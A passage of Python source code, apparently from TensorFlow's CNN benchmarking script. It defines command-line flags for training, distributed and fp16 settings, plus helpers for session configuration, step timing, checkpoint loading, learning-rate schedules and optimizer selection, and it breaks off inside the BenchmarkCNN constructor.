None, "Base learning rate at bs=256. Only " "relevant when training ResNet and utilizing the model's " "learning rate heuristic (get_learning_rate).") flags.DEFINE_float('momentum', 0.9, 'Momentum for training.') flags.DEFINE_float('rmsprop_decay', 0.9, 'Decay term for RMSProp.') flags.DEFINE_float('rmsprop_momentum', 0.9, 'Momentum in RMSProp.') flags.DEFINE_float('rmsprop_epsilon', 1.0, 'Epsilon term for RMSProp.') flags.DEFINE_float('adam_beta1', 0.9, 'Beta2 term for the Adam optimizer') flags.DEFINE_float('adam_beta2', 0.999, 'Beta2 term for the Adam optimizer') flags.DEFINE_float('adam_epsilon', 1e-8, 'Epsilon term for the Adam optimizer') flags.DEFINE_float('gradient_clip', None, 'Gradient clipping magnitude. Disabled by default.') flags.DEFINE_float('weight_decay', 0.00004, 'Weight decay factor for training.') flags.DEFINE_float('gpu_memory_frac_for_testing', 0, 'If non-zero, the fraction of GPU memory that will be used. ' 'Useful for testing the benchmark script, as this allows ' 'distributed mode to be run on a single machine. For ' 'example, if there are two tasks, each can be allocated ' '~40 percent of the memory on a single machine', lower_bound=0., upper_bound=1.) flags.DEFINE_boolean('use_unified_memory', False, 'If True, allocate unified memory enabling larger models ' 'to fit in available device RAM.') flags.DEFINE_boolean('use_tf_layers', True, 'If True, use tf.layers for neural network layers. This ' 'should not affect performance or accuracy in any way.') flags.DEFINE_integer('tf_random_seed', 1234, 'The TensorFlow random seed. Useful for debugging NaNs, ' 'as this can be set to various values to see if the NaNs ' 'depend on the seed.') flags.DEFINE_string('debugger', None, 'If set, use the TensorFlow debugger. If set to "cli", use ' 'the local CLI debugger. Otherwise, this must be in the ' 'form hostname:port (e.g., localhost:7007) in which case ' 'the experimental TensorBoard debugger will be used') flags.DEFINE_boolean('use_python32_barrier', False, 'When on, use threading.Barrier at Python 3.2.') flags.DEFINE_boolean('ml_perf', False, 'When True, change how the Imagenet input pipeline works ' 'slightly to meet the MLPerf compliance rules. This slows ' 'down the input pipeline. Without this option, at the end ' 'of the input pipeline, the image is divided by 127.5, ' 'then 1.0 is subtracted from it, bringing the image ' 'values from [0, 255] to [-1.0, 1.0]. With this option, ' 'each of the three channels (red, green, blue) have the ' 'average channel value among all image subtracted from ' 'it, and no division is done.') flags.DEFINE_boolean('datasets_use_prefetch', True, 'Enable use of prefetched datasets for input pipeline. ' 'This option is meaningless if use_datasets=False.') flags.DEFINE_integer('datasets_prefetch_buffer_size', 1, 'Prefetching op buffer size per compute device.') flags.DEFINE_integer('datasets_num_private_threads', None, 'Number of threads for a private threadpool created for ' 'all datasets computation. By default, we pick an ' 'appropriate number. If set to 0, we use the default ' 'tf-Compute threads for dataset operations.') flags.DEFINE_boolean('datasets_use_caching', False, 'Cache the compressed input data in memory. This improves ' 'the data input performance, at the cost of additional ' 'memory.') flags.DEFINE_integer('datasets_parallel_interleave_cycle_length', None, 'Number of parallel file readers interleaving input data.') flags.DEFINE_boolean('datasets_sloppy_parallel_interleave', False, 'Allow parallel interleave to depart from deterministic ' 'ordering, by temporarily skipping over files whose ' 'elements are not readily available. This can increase ' 'througput in particular in the presence of stragglers.') flags.DEFINE_integer('datasets_parallel_interleave_prefetch', None, 'The number of input elements to fetch before they are ' 'needed for interleaving.') flags.DEFINE_float('max_duration', None, 'The maximum training duration in minutes') flags.DEFINE_boolean( 'use_multi_device_iterator', True, 'If true, we use the MultiDeviceIterator for prefetching, ' 'which deterministically prefetches the data onto the ' 'various GPUs') flags.DEFINE_integer( 'multi_device_iterator_max_buffer_size', 1, 'Configuration parameter for the MultiDeviceIterator that ' ' specifies the host side buffer size for each device.') # Performance tuning parameters. flags.DEFINE_boolean('winograd_nonfused', True, 'Enable/disable using the Winograd non-fused algorithms.') flags.DEFINE_boolean( 'batchnorm_persistent', True, 'Enable/disable using the CUDNN_BATCHNORM_SPATIAL_PERSISTENT ' 'mode for batchnorm.') flags.DEFINE_boolean('sync_on_finish', False, 'Enable/disable whether the devices are synced after each ' 'step.') flags.DEFINE_boolean('staged_vars', False, 'whether the variables are staged from the main ' 'computation') flags.DEFINE_boolean('force_gpu_compatible', False, 'whether to enable force_gpu_compatible in GPU_Options') flags.DEFINE_boolean('allow_growth', None, 'whether to enable allow_growth in GPU_Options') flags.DEFINE_boolean('xla', False, 'whether to enable XLA auto-jit compilation') flags.DEFINE_boolean('xla_compile', False, 'Enable xla to compile the graph. Uncompilable ops will ' 'result in fatal errors.') flags.DEFINE_boolean('fuse_decode_and_crop', True, 'Fuse decode_and_crop for image preprocessing.') flags.DEFINE_boolean('distort_color_in_yiq', True, 'Distort color of input images in YIQ space.') flags.DEFINE_boolean('enable_optimizations', True, 'Whether to enable grappler and other optimizations.') flags.DEFINE_string('rewriter_config', None, 'Config for graph optimizers, described as a ' 'RewriterConfig proto buffer.') flags.DEFINE_enum('loss_type_to_report', 'total_loss', ('base_loss', 'total_loss'), 'Which type of loss to output and to write summaries for. ' 'The total loss includes L2 loss while the base loss does ' 'not. Note that the total loss is always used while ' 'computing gradients during training if weight_decay > 0, ' 'but explicitly computing the total loss, instead of just ' 'computing its gradients, can have a performance impact.') flags.DEFINE_boolean('single_l2_loss_op', False, 'If True, instead of using an L2 loss op per variable, ' 'concatenate the variables into a single tensor and do a ' 'single L2 loss on the concatenated tensor.') flags.DEFINE_boolean('use_resource_vars', False, 'Use resource variables instead of normal variables. ' 'Resource variables are slower, but this option is useful ' 'for debugging their performance.') flags.DEFINE_boolean('compute_lr_on_cpu', False, 'If True, do computations related to learning rate on the ' 'CPU instead of the GPU. This will significantly improve ' 'XLA performance in some cases.') flags.DEFINE_boolean('sparse_to_dense_grads', False, 'If True, convert all sparse gradients to dense gradients ' 'before passing them to the optimizer to update ' 'variables. Only affects models with sparse gradients, ' 'which currently is only the NCF model.') # Performance tuning specific to MKL. flags.DEFINE_boolean('mkl', False, 'If true, set MKL environment variables.') flags.DEFINE_integer('kmp_blocktime', 0, 'The time, in milliseconds, that a thread should wait, ' 'after completing the execution of a parallel region, ' 'before sleeping') flags.DEFINE_string('kmp_affinity', 'granularity=fine,verbose,compact,1,0', 'Restricts execution of certain threads (virtual execution ' 'units) to a subset of the physical processing units in a ' 'multiprocessor computer.') flags.DEFINE_integer('kmp_settings', 1, 'If set to 1, MKL settings will be printed.') # fp16 parameters. If use_fp16=False, no other fp16 parameters apply. flags.DEFINE_boolean('use_fp16', False, 'Use 16-bit floats for certain tensors instead of 32-bit ' 'floats. This is currently experimental.') # TODO(reedwm): The default loss scale of 128 causes most models to diverge # on the second step with synthetic data. Changing the tf.set_random_seed # call to tf.set_random_seed(1235) or most other seed values causes the # issue not to occur. flags.DEFINE_float('fp16_loss_scale', None, 'If fp16 is enabled, the loss is multiplied by this amount ' 'right before gradients are computed, then each gradient ' 'is divided by this amount. Mathematically, this has no ' 'effect, but it helps avoid fp16 underflow. Set to 1 to ' 'effectively disable. Ignored during eval.') flags.DEFINE_boolean('fp16_vars', False, 'If fp16 is enabled, also use fp16 for variables. If ' 'False, the variables are stored in fp32 and casted to ' 'fp16 when retrieved. Recommended to leave as False.') flags.DEFINE_boolean('fp16_enable_auto_loss_scale', False, 'If True and use_fp16 is True, automatically adjust the ' 'loss scale during training.') flags.DEFINE_integer('fp16_inc_loss_scale_every_n', 1000, 'If fp16 is enabled and fp16_enable_auto_loss_scale is ' 'True, increase the loss scale every n steps.') # The method for managing variables: # parameter_server: variables are stored on a parameter server that holds # the master copy of the variable. In local execution, a local device # acts as the parameter server for each variable; in distributed # execution, the parameter servers are separate processes in the # cluster. # For each step, each tower gets a copy of the variables from the # parameter server, and sends its gradients to the param server. # replicated: each GPU has its own copy of the variables. To apply # gradients, an all_reduce algorithm or or regular cross-device # aggregation is used to replicate the combined gradients to all # towers (depending on all_reduce_spec parameter setting). # independent: each GPU has its own copy of the variables, and gradients # are not shared between towers. This can be used to check performance # when no data is moved between GPUs. # distributed_replicated: Distributed training only. Each GPU has a copy # of the variables, and updates its copy after the parameter servers # are all updated with the gradients from all servers. Only works with # cross_replica_sync=true. Unlike 'replicated', currently never uses # nccl all-reduce for replicating within a server. # distributed_all_reduce: Distributed training where all replicas run # in a single session, using all-reduce to mutally reduce the # gradients. Uses no parameter servers. When there is only one # worker, this is the same as replicated. # collective_all_reduce: Distributed training where all replicas run # independepently except for variable initialization and for # gradient reduction which is done via collective all-reduce. # NOTE: collective_all_reduce in conjunction with use_fp16 can # lead to NaNs in some models (resnet50). TODO(tucker): fix it. # horovod: Distributed training using Horovod library. Runs workers using # an MPI framework (e.g. Open MPI). Each worker runs training on # single GPU, and averages gradients using NCCL or MPI all-reduce. # See https://github.com/uber/horovod for more details. flags.DEFINE_enum('variable_update', 'parameter_server', ('parameter_server', 'replicated', 'distributed_replicated', 'independent', 'distributed_all_reduce', 'collective_all_reduce', 'horovod'), 'The method for managing variables: parameter_server, ' 'replicated, distributed_replicated, independent, ' 'distributed_all_reduce, collective_all_reduce, horovod') flags.DEFINE_string('all_reduce_spec', None, 'A specification of the all_reduce algorithm to be used ' 'for reducing gradients. For more details, see ' 'parse_all_reduce_spec in variable_mgr.py. An ' 'all_reduce_spec has BNF form:\n' 'int ::= positive whole number\n' 'g_int ::= int[KkMGT]?\n' 'alg_spec ::= alg | alg#int\n' 'range_spec ::= alg_spec | alg_spec/alg_spec\n' 'spec ::= range_spec | range_spec:g_int:range_spec\n' 'NOTE: not all syntactically correct constructs are ' 'supported.\n\n' 'Examples:\n ' '"xring" == use one global ring reduction for all ' 'tensors\n' '"pscpu" == use CPU at worker 0 to reduce all tensors\n' '"nccl" == use NCCL to locally reduce all tensors. ' 'Limited to 1 worker.\n' '"nccl/xring" == locally (to one worker) reduce values ' 'using NCCL then ring reduce across workers.\n' '"pscpu:32k:xring" == use pscpu algorithm for tensors of ' 'size up to 32kB, then xring for larger tensors.') # If variable_update==distributed_all_reduce then it may be advantageous # to aggregate small tensors into one prior to reduction. These parameters # control that aggregation. flags.DEFINE_integer('agg_small_grads_max_bytes', 0, 'If > 0, try to aggregate tensors of less than this ' 'number of bytes prior to all-reduce.') flags.DEFINE_integer('agg_small_grads_max_group', 10, 'When aggregating small tensors for all-reduce do not ' 'aggregate more than this many into one new tensor.') flags.DEFINE_integer('allreduce_merge_scope', 1, 'Establish a name scope around this many ' 'gradients prior to creating the all-reduce operations. ' 'It may affect the ability of the backend to merge ' 'parallel ops.') # Distributed training parameters. flags.DEFINE_enum('job_name', '', ('ps', 'worker', 'controller', ''), 'One of "ps", "worker", "controller", "". Empty for local ' 'training') flags.DEFINE_string('ps_hosts', '', 'Comma-separated list of target hosts') flags.DEFINE_string('worker_hosts', '', 'Comma-separated list of target hosts') flags.DEFINE_string('controller_host', None, 'optional controller host') flags.DEFINE_integer('task_index', 0, 'Index of task within the job') flags.DEFINE_string('server_protocol', 'grpc', 'protocol for servers') flags.DEFINE_boolean('cross_replica_sync', True, '') flags.DEFINE_string('horovod_device', '', 'Device to do Horovod all-reduce on: ' 'empty (default), cpu or gpu. Default with utilize GPU if ' 'Horovod was compiled with the HOROVOD_GPU_ALLREDUCE ' 'option, and CPU otherwise.') # Summary and Save & load checkpoints. flags.DEFINE_integer('summary_verbosity', 0, 'Verbosity level for summary ops. ' 'level 0: disable any summary.\n' 'level 1: small and fast ops, e.g.: learning_rate, ' 'total_loss.\n' 'level 2: medium-cost ops, e.g. histogram of all ' 'gradients.\n' 'level 3: expensive ops: images and histogram of each ' 'gradient.\n') flags.DEFINE_integer('save_summaries_steps', 0, 'How often to save summaries for trained models. Pass 0 ' 'to disable summaries.') flags.DEFINE_integer('save_model_secs', 0, 'How often to save trained models. Pass 0 to disable ' 'saving checkpoints every N seconds. A checkpoint is ' 'saved after training completes regardless of this ' 'option.') flags.DEFINE_integer('save_model_steps', None, 'How often to save trained models. If specified, ' 'save_model_secs must not be specified.') flags.DEFINE_integer('max_ckpts_to_keep', 5, 'Max number of checkpoints to keep.') flags.DEFINE_string('train_dir', None, 'Path to session checkpoints. Pass None to disable saving ' 'checkpoint at the end.') flags.DEFINE_string('eval_dir', '/tmp/tf_cnn_benchmarks/eval', 'Directory where to write eval event logs.') flags.DEFINE_string('backbone_model_path', None, 'Path to pretrained backbone model checkpoint. Pass None ' 'if not using a backbone model.') flags.DEFINE_enum('trt_mode', '', ['', 'FP32', 'FP16', 'INT8'], 'If this is specified in forward_only mode and ' 'freeze_when_forward_only is set to True, use TensorRT to ' 'optimize the graph before execution.') flags.DEFINE_integer('trt_max_workspace_size_bytes', 4 << 30, 'Max workspace size bytes used by the TensorRT optimizer.') # Benchmark logging for model garden metric flags.DEFINE_string('benchmark_log_dir', None, 'The directory to place the log files containing the ' 'results of benchmark. The logs are created by ' 'BenchmarkFileLogger. Requires the root of the Tensorflow ' 'models repository to be in $PYTHTONPATH.') flags.DEFINE_string('benchmark_test_id', None, 'The unique test ID of the benchmark run. It could be the ' 'combination of key parameters. It is hardware independent ' 'and could be used compare the performance between ' 'different test runs. This flag is designed for human ' 'consumption, and does not have any impact within the ' 'system.') platforms_util.define_platform_params() class GlobalStepWatcher(threading.Thread): """A helper class for global_step. Polls for changes in the global_step of the model, and finishes when the number of steps for the global run are done. """ def __init__(self, sess, global_step_op, start_at_global_step, end_at_global_step): threading.Thread.__init__(self) self.sess = sess self.global_step_op = global_step_op self.start_at_global_step = start_at_global_step self.end_at_global_step = end_at_global_step self.start_time = 0 self.start_step = 0 self.finish_time = 0 self.finish_step = 0 def run(self): while self.finish_time == 0: time.sleep(.25) global_step_val, = self.sess.run([self.global_step_op]) if self.start_time == 0 and global_step_val >= self.start_at_global_step: # Use tf.logging.info instead of log_fn, since print (which is log_fn) # is not thread safe and may interleave the outputs from two parallel # calls to print, which can break tests. tf.logging.info('Starting real work at step %s at time %s' % (global_step_val, time.ctime())) self.start_time = time.time() self.start_step = global_step_val if self.finish_time == 0 and global_step_val >= self.end_at_global_step: tf.logging.info('Finishing real work at step %s at time %s' % (global_step_val, time.ctime())) self.finish_time = time.time() self.finish_step = global_step_val def done(self): return self.finish_time > 0 def num_steps(self): return self.finish_step - self.start_step def elapsed_time(self): return self.finish_time - self.start_time class CheckpointNotFoundException(Exception): pass def create_config_proto(params): """Returns session config proto. Args: params: Params tuple, typically created by make_params or make_params_from_flags. """ config = tf.ConfigProto() config.allow_soft_placement = True if params.num_intra_threads is None: if params.device == 'gpu': config.intra_op_parallelism_threads = 1 else: config.intra_op_parallelism_threads = params.num_intra_threads config.inter_op_parallelism_threads = params.num_inter_threads config.experimental.collective_group_leader = '/job:worker/replica:0/task:0' config.gpu_options.force_gpu_compatible = params.force_gpu_compatible if params.allow_growth is not None: config.gpu_options.allow_growth = params.allow_growth if params.gpu_memory_frac_for_testing > 0: config.gpu_options.per_process_gpu_memory_fraction = ( params.gpu_memory_frac_for_testing) if params.use_unified_memory: config.gpu_options.experimental.use_unified_memory = True if params.xla: config.graph_options.optimizer_options.global_jit_level = ( tf.OptimizerOptions.ON_1) # TODO(b/117324590): Re-enable PinToHostOptimizer when b/117324590 is fixed. # Currently we have to disable PinToHostOptimizer w/ XLA since it causes # OOM/perf cliffs. config.graph_options.rewrite_options.pin_to_host_optimization = ( rewriter_config_pb2.RewriterConfig.OFF) if params.rewriter_config: rewriter_config = rewriter_config_pb2.RewriterConfig() text_format.Merge(params.rewriter_config, rewriter_config) config.graph_options.rewrite_options.CopyFrom(rewriter_config) elif not params.enable_optimizations: off = rewriter_config_pb2.RewriterConfig.OFF config.graph_options.optimizer_options.opt_level = tf.OptimizerOptions.L0 rewrite_options = config.graph_options.rewrite_options rewrite_options.layout_optimizer = off rewrite_options.constant_folding = off rewrite_options.shape_optimization = off rewrite_options.remapping = off rewrite_options.arithmetic_optimization = off rewrite_options.dependency_optimization = off rewrite_options.loop_optimization = off rewrite_options.function_optimization = off rewrite_options.debug_stripper = off rewrite_options.disable_model_pruning = True rewrite_options.scoped_allocator_optimization = off rewrite_options.memory_optimization = ( rewriter_config_pb2.RewriterConfig.NO_MEM_OPT) rewrite_options.pin_to_host_optimization = off elif params.variable_update == 'collective_all_reduce': rewrite_options = config.graph_options.rewrite_options rewrite_options.scoped_allocator_optimization = ( rewriter_config_pb2.RewriterConfig.ON) rewrite_options.scoped_allocator_opts.enable_op.append('CollectiveReduce') if params.variable_update == 'horovod': import horovod.tensorflow as hvd # pylint: disable=g-import-not-at-top config.gpu_options.visible_device_list = str(hvd.local_rank()) return config def get_mode_from_params(params): """Returns the mode in which this script is running. Args: params: Params tuple, typically created by make_params or make_params_from_flags. Raises: ValueError: Unsupported params settings. """ if params.forward_only and params.eval: raise ValueError('Only one of forward_only and eval parameters is true') if params.eval: return constants.BenchmarkMode.EVAL elif params.forward_only: return constants.BenchmarkMode.FORWARD_ONLY elif (params.eval_during_training_every_n_steps or params.eval_during_training_every_n_epochs or params.eval_during_training_at_specified_steps or params.eval_during_training_at_specified_epochs): return constants.BenchmarkMode.TRAIN_AND_EVAL else: return constants.BenchmarkMode.TRAIN # How many digits to show for the loss and accuracies during training. LOSS_AND_ACCURACY_DIGITS_TO_SHOW = 3 def benchmark_one_step(sess, fetches, step, batch_size, step_train_times, trace_filename, partitioned_graph_file_prefix, profiler, image_producer, params, summary_op=None, show_images_per_sec=True, benchmark_logger=None, collective_graph_key=0): """Advance one step of benchmarking.""" should_profile = profiler and 0 <= step < _NUM_STEPS_TO_PROFILE need_options_and_metadata = ( should_profile or collective_graph_key > 0 or ((trace_filename or partitioned_graph_file_prefix) and step == -2) ) if need_options_and_metadata: run_options = tf.RunOptions() if (trace_filename and step == -2) or should_profile: run_options.trace_level = tf.RunOptions.FULL_TRACE if partitioned_graph_file_prefix and step == -2: run_options.output_partition_graphs = True if collective_graph_key > 0: run_options.experimental.collective_graph_key = collective_graph_key run_metadata = tf.RunMetadata() else: run_options = None run_metadata = None summary_str = None start_time = time.time() if summary_op is None: results = sess.run(fetches, options=run_options, run_metadata=run_metadata) else: (results, summary_str) = sess.run( [fetches, summary_op], options=run_options, run_metadata=run_metadata) if not params.forward_only: lossval = results['average_loss'] else: lossval = 0. if image_producer is not None: image_producer.notify_image_consumption() train_time = time.time() - start_time step_train_times.append(train_time) if (show_images_per_sec and step >= 0 and (step == 0 or (step + 1) % params.display_every == 0)): speed_mean, speed_uncertainty, speed_jitter = get_perf_timing( batch_size, step_train_times, params.display_perf_ewma) log_str = '%i\t%s\t%.*f' % ( step + 1, get_perf_timing_str(speed_mean, speed_uncertainty, speed_jitter), LOSS_AND_ACCURACY_DIGITS_TO_SHOW, lossval) if 'top_1_accuracy' in results: log_str += '\t%.*f\t%.*f' % ( LOSS_AND_ACCURACY_DIGITS_TO_SHOW, results['top_1_accuracy'], LOSS_AND_ACCURACY_DIGITS_TO_SHOW, results['top_5_accuracy']) log_fn(log_str) if benchmark_logger: benchmark_logger.log_metric( 'current_examples_per_sec', speed_mean, global_step=step + 1) if 'top_1_accuracy' in results: benchmark_logger.log_metric( 'top_1_accuracy', results['top_1_accuracy'], global_step=step + 1) benchmark_logger.log_metric( 'top_5_accuracy', results['top_5_accuracy'], global_step=step + 1) if need_options_and_metadata: if should_profile: profiler.add_step(step, run_metadata) if trace_filename and step == -2: log_fn('Dumping trace to %s' % trace_filename) trace_dir = os.path.dirname(trace_filename) if not gfile.Exists(trace_dir): gfile.MakeDirs(trace_dir) with gfile.Open(trace_filename, 'w') as trace_file: if params.use_chrome_trace_format: trace = timeline.Timeline(step_stats=run_metadata.step_stats) trace_file.write(trace.generate_chrome_trace_format(show_memory=True)) else: trace_file.write(str(run_metadata.step_stats)) if partitioned_graph_file_prefix and step == -2: path, filename = os.path.split(partitioned_graph_file_prefix) if '.' in filename: base_filename, ext = filename.rsplit('.', 1) ext = '.' + ext else: base_filename, ext = filename, '' as_text = filename.endswith('txt') for graph_def in run_metadata.partition_graphs: device = graph_def.node[0].device.replace('/', '_').replace(':', '_') graph_filename = '%s%s%s' % (base_filename, device, ext) log_fn('Writing partitioned GraphDef as %s to %s' % ( 'text' if as_text else 'binary', os.path.join(path, graph_filename))) tf.train.write_graph(graph_def, path, graph_filename, as_text) return (summary_str, lossval) def get_perf_timing_str(speed_mean, speed_uncertainty, speed_jitter, scale=1): if scale == 1: # TODO(laigd): rename 'images' to maybe 'inputs', same below. return ('images/sec: %.1f +/- %.1f (jitter = %.1f)' % (speed_mean, speed_uncertainty, speed_jitter)) else: return 'images/sec: %.1f' % speed_mean def get_perf_timing(batch_size, step_train_times, ewma_alpha=None, scale=1): """Calculate benchmark processing speed.""" times = np.array(step_train_times) speeds = batch_size / times if ewma_alpha: weights = np.logspace(len(times)-1, 0, len(times), base=1-ewma_alpha) time_mean = np.average(times, weights) else: time_mean = np.mean(times) speed_mean = scale * batch_size / time_mean speed_uncertainty = np.std(speeds) / np.sqrt(float(len(speeds))) speed_jitter = 1.4826 * np.median(np.abs(speeds - np.median(speeds))) return speed_mean, speed_uncertainty, speed_jitter def load_checkpoint(saver, sess, ckpt_dir): """Loads checkpoint from provided directory or full path. Args: saver: Saver used to restore the checkpoint. sess: TensorFlow session. ckpt_dir: Path to a folder of checkpoints or full path to a checkpoint. Returns: Global step. """ model_checkpoint_path = _get_checkpoint_to_load(ckpt_dir) global_step = model_checkpoint_path.split('/')[-1].split('-')[-1] if not global_step.isdigit(): global_step = 0 else: global_step = int(global_step) saver.restore(sess, model_checkpoint_path) log_fn('Successfully loaded model from %s.' % model_checkpoint_path) return global_step def _get_checkpoint_to_load(ckpt_dir): """Returns which checkpoint to load. Args: ckpt_dir: Path to a folder of checkpoints or full path to a checkpoint. Returns: Full path to checkpoint to load. Raises: CheckpointNotFoundException: If checkpoint is not found. """ p = re.compile(r'ckpt-\d+$') if p.search(ckpt_dir): model_checkpoint_path = ckpt_dir else: # Finds latest checkpoint in directory provided ckpt = tf.train.get_checkpoint_state(ckpt_dir) if ckpt and ckpt.model_checkpoint_path: model_checkpoint_path = ckpt.model_checkpoint_path else: raise CheckpointNotFoundException('No checkpoint file found in dir:{}'. format(ckpt_dir)) return model_checkpoint_path # Params are passed to BenchmarkCNN's constructor. Params is a map from name # to value, with one field per key in flags.param_specs. # # Call make_params() or make_params_from_flags() below to construct a Params # tuple with default values from flags.param_specs, rather than constructing # Params directly. Params = namedtuple('Params', flags.param_specs.keys()) # pylint: disable=invalid-name def validate_params(params): """Validates that the Params tuple had valid values. When command-line flags are defined for each ParamSpec by calling flags.define_flags(), calling this function is unnecessary because absl already does flag validation. Otherwise, this function should be called. Args: params: A Params tuple. Raises: ValueError: An element of params had an invalid value. """ for name, value in params._asdict().items(): param_spec = flags.param_specs[name] if param_spec.flag_type in ('integer', 'float'): if (value is not None and param_spec.kwargs['lower_bound'] is not None and value < param_spec.kwargs['lower_bound']): raise ValueError('Param %s value of %s is lower than the lower bound ' 'of %s' % (name, value, param_spec.kwargs['lower_bound'])) if (value is not None and param_spec.kwargs['upper_bound'] is not None and param_spec.kwargs['upper_bound'] < value): raise ValueError('Param %s value of %s is higher than the upper bound ' 'of %s' % (name, value, param_spec.kwargs['upper_bound'])) elif (value is not None and param_spec.flag_type == 'enum' and value not in param_spec.kwargs['enum_values']): raise ValueError('Param %s of value %s is not in %s'% (name, value, param_spec.kwargs['enum_values'])) def make_params(**kwargs): """Create a Params tuple for BenchmarkCNN from kwargs. Default values are filled in from flags.param_specs. Args: **kwargs: kwarg values will override the default values. Returns: Params namedtuple for constructing BenchmarkCNN. """ # Create a (name: default_value) map from flags.param_specs. default_kwargs = { name: flags.param_specs[name].default_value for name in flags.param_specs } params = Params(**default_kwargs)._replace(**kwargs) validate_params(params) return params def make_params_from_flags(): """Create a Params tuple for BenchmarkCNN from absl_flags.FLAGS. Returns: Params namedtuple for constructing BenchmarkCNN. """ # Collect (name: value) pairs for absl_flags.FLAGS with matching names in # flags.param_specs. flag_values = {name: getattr(absl_flags.FLAGS, name) for name in flags.param_specs.keys()} return Params(**flag_values) def remove_param_fields(params, fields_to_remove): """Remove fields from a Params namedtuple.""" params_dict = params._asdict() for field in fields_to_remove: assert field in params_dict, 'Invalid Params field: ' + field params_dict = {k: v for k, v in params_dict.items() if k not in fields_to_remove} new_params_type = namedtuple('Params', params_dict.keys()) return new_params_type(**params_dict) def get_num_batches_and_epochs(params, batch_size, num_examples_per_epoch): """Returns the number of batches and epochs to run for. Args: params: Params tuple, typically created by make_params or make_params_from_flags. batch_size: The number of images per step. num_examples_per_epoch: The number of images in a single epoch. Returns: num_batches: The number of batches to run for. num_epochs: The number of epochs to run for. This might be slightly smaller than params.num_epochs if specified, because the number of batches must be an integer. Raises: ValueError: Invalid or unsupported params. """ if params.num_batches and params.num_epochs: raise ValueError('At most one of --num_batches and --num_epochs may be ' 'specified.') if params.num_epochs: num_batches = int(params.num_epochs * num_examples_per_epoch + batch_size - 1) // batch_size else: num_batches = params.num_batches or _DEFAULT_NUM_BATCHES num_epochs = num_batches * batch_size / num_examples_per_epoch return (num_batches, num_epochs) def get_piecewise_learning_rate(piecewise_learning_rate_schedule, global_step, num_batches_per_epoch): """Returns a piecewise learning rate tensor. Args: piecewise_learning_rate_schedule: The --piecewise_learning_rate_schedule parameter global_step: Scalar tensor representing the global step. num_batches_per_epoch: float indicating the number of batches per epoch. Returns: A scalar float tensor, representing the learning rate. Raises: ValueError: piecewise_learning_rate_schedule is not formatted correctly. """ pieces = piecewise_learning_rate_schedule.split(';') if len(pieces) % 2 == 0: raise ValueError('--piecewise_learning_rate_schedule must have an odd ' 'number of components') values = [] boundaries = [] for i, piece in enumerate(pieces): if i % 2 == 0: try: values.append(float(piece)) except ValueError: raise ValueError('Invalid learning rate: ' + piece) else: try: boundaries.append(int(int(piece) * num_batches_per_epoch) - 1) except ValueError: raise ValueError('Invalid epoch: ' + piece) return tf.train.piecewise_constant(global_step, boundaries, values, name='piecewise_learning_rate') def get_learning_rate(params, global_step, num_examples_per_epoch, model, batch_size): """Returns a learning rate tensor based on global_step. Args: params: Params tuple, typically created by make_params or make_params_from_flags. global_step: Scalar tensor representing the global step. num_examples_per_epoch: The number of examples per epoch. model: The model.Model object to obtain the default learning rate from if no learning rate is specified. batch_size: Number of examples per step Returns: A scalar float tensor, representing the learning rate. When evaluated, the learning rate depends on the current value of global_step. Raises: ValueError: Invalid or unsupported params. """ with tf.name_scope('learning_rate'): num_batches_per_epoch = num_examples_per_epoch / batch_size if params.piecewise_learning_rate_schedule: if (params.init_learning_rate is not None or params.learning_rate_decay_factor or params.minimum_learning_rate or params.num_epochs_per_decay): raise ValueError('No other learning rate-related flags can be ' 'specified if --piecewise_learning_rate_schedule is ' 'specified') learning_rate = get_piecewise_learning_rate( params.piecewise_learning_rate_schedule, global_step, num_batches_per_epoch) elif params.init_learning_rate is not None: learning_rate = params.init_learning_rate if (params.num_epochs_per_decay > 0 and params.learning_rate_decay_factor > 0): decay_steps = int(num_batches_per_epoch * params.num_epochs_per_decay) # Decay the learning rate exponentially based on the number of steps. learning_rate = tf.train.exponential_decay( params.init_learning_rate, global_step, decay_steps, params.learning_rate_decay_factor, staircase=True) if params.minimum_learning_rate != 0.: learning_rate = tf.maximum(learning_rate, params.minimum_learning_rate) else: learning_rate = model.get_learning_rate(global_step, batch_size) if params.num_learning_rate_warmup_epochs > 0 and ( params.init_learning_rate is not None or params.piecewise_learning_rate_schedule): warmup_steps = int(num_batches_per_epoch * params.num_learning_rate_warmup_epochs) init_lr = params.init_learning_rate if init_lr is None: init_lr = float(params.piecewise_learning_rate_schedule.split(';')[0]) warmup_lr = init_lr * tf.cast(global_step, tf.float32) / tf.cast( warmup_steps, tf.float32) learning_rate = tf.cond(global_step < warmup_steps, lambda: warmup_lr, lambda: learning_rate) learning_rate = mlperf.logger.log_deferred_tensor_value( mlperf.tags.OPT_LR, learning_rate, global_step, every_n=100) return learning_rate def get_optimizer(params, learning_rate): """Returns the optimizer that should be used based on params.""" if params.optimizer == 'momentum': mlperf.logger.log(key=mlperf.tags.OPT_NAME, value=mlperf.tags.SGD_WITH_MOMENTUM) mlperf.logger.log(key=mlperf.tags.OPT_MOMENTUM, value=params.momentum) opt = tf.train.MomentumOptimizer( learning_rate, params.momentum, use_nesterov=True) elif params.optimizer == 'sgd': mlperf.logger.log(key=mlperf.tags.OPT_NAME, value=mlperf.tags.SGD) opt = tf.train.GradientDescentOptimizer(learning_rate) elif params.optimizer == 'rmsprop': opt = tf.train.RMSPropOptimizer( learning_rate, params.rmsprop_decay, momentum=params.rmsprop_momentum, epsilon=params.rmsprop_epsilon) elif params.optimizer == 'adam': opt = tf.train.AdamOptimizer(learning_rate, params.adam_beta1, params.adam_beta2, params.adam_epsilon) else: raise ValueError('Optimizer "{}" was not recognized'. format(params.optimizer)) return opt def generate_tfprof_profile(profiler, tfprof_file): """Generates a tfprof profile, writing it to a file and printing top ops. Args: profiler: A tf.profiler.Profiler. `profiler.add_step` must have already been called. tfprof_file: The filename to write the ProfileProto to. """ profile_proto = profiler.serialize_to_string() log_fn('Dumping ProfileProto to %s' % tfprof_file) with gfile.Open(tfprof_file, 'wb') as f: f.write(profile_proto) # Print out the execution times of the top operations. Note this # information can also be obtained with the dumped ProfileProto, but # printing it means tfprof doesn't have to be used if all the user wants # is the top ops. options = tf.profiler.ProfileOptionBuilder.time_and_memory() options['max_depth'] = _NUM_OPS_TO_PRINT options['order_by'] = 'accelerator_micros' profiler.profile_operations(options) class BenchmarkCNN(object): """Class for benchmarking a cnn network.""" def __init__(self, params, dataset=None, model=None): """Initialize BenchmarkCNN. Args: params: Params tuple, typically created by make_params or make_params_from_flags. dataset: If not None, the dataset to use. Otherwise, params is used to obtain the dataset. model: If not None, the model to use. Otherwise, params is used to obtain the model. Raises: ValueError: Unsupported params settings. """ mlperf.logger.log(key=mlperf.tags.RUN_START) self.params = params if params.eval: self._doing_eval 